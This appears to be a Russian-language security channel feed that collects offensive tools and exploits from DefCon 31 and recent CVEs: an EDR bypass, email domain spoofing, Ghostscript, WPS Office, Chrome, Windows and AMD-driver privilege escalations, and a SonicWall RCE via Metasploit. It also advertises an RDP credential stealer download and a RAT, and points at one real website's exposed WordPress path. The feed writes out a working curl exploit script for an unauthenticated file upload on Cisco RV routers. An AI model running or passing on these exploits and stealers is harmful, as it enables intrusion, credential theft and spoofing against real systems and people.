VED-eBPF: Kernel Exploit and Rootkit Detection using eBPF
Go

#linux #kernel

Defcon 31 начинает приносить свои первые плоды
POC для обхода EDR в рамках злоупотребления Windows containers framework
download

#edr #bypass #defcon

Утры

Продолжаем публиковать материалы с DefCon 31
SpamChannel
Подделка писем с любого домена с помощью MailChannels (+2 миллиона доменов)
Упор как всегда на DNS записи SPF и DMARC
Пыщь/download

CVE-2023-36664
Ghostnoscript command injection vulnerability PoC exploit
exploit

#ghostScript #exploit

DllNotificationInection
Используя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )
*
WriteUp "must have"
*
POC

WPS Office RCE
Версии: WPS Office 2023 и WPS Office 2019
writeUp
ProofOfConcept

Если нужно быстро сориентироваться по системным вызовам ядра Linux.
Числа и параметры для различных архитектур и версий ядра.
https://syscalls.mebeim.net

#linux #syscalls #arch

Вам пишет сам сатана !
Демонстрация SpamChannel
https://www.youtube.com/watch?v=61PIOBp30vA

Я календарь переверну
И снова RATник в сентябре

RDP Credential Stealer
*
download
*
HowToUse

#win #rdp

Тревожные кадры, а еще там xmprpc есть
http://dramaalert.com/wp-includes/

CVE-2023-3079 google chrome
*
exploit

Что, если вы запустите сканирование nmap и ВСЕ 65535 портов будут открыты?

-A PREROUTING -i eth0 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444 

Где 4444 HoneyPot, например.

#HA-HA

dir-300 еще никогда не был так опасен 😀

CVE-2023-20073
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:
#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><noscript>alert('JS-test')</noscript>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"

#cisco

Отслеживание интересной малвари для Linux (и UNIX).
Трэкнуть

#linux #malware

OWASP Top 10 - video
*
download

CVE-2023-36874 
уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.
*
POC exploit
*
Read - exploit for 0-day Windows Error Reporting Service bug
#windows #lpe

HITCON 2023
Демонстрация использования AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.
*
Exploit

#AMD

Sonicwall rce CVE-2023-34124
*
metasploit
*

use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124

ну да ну да 🙃
Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets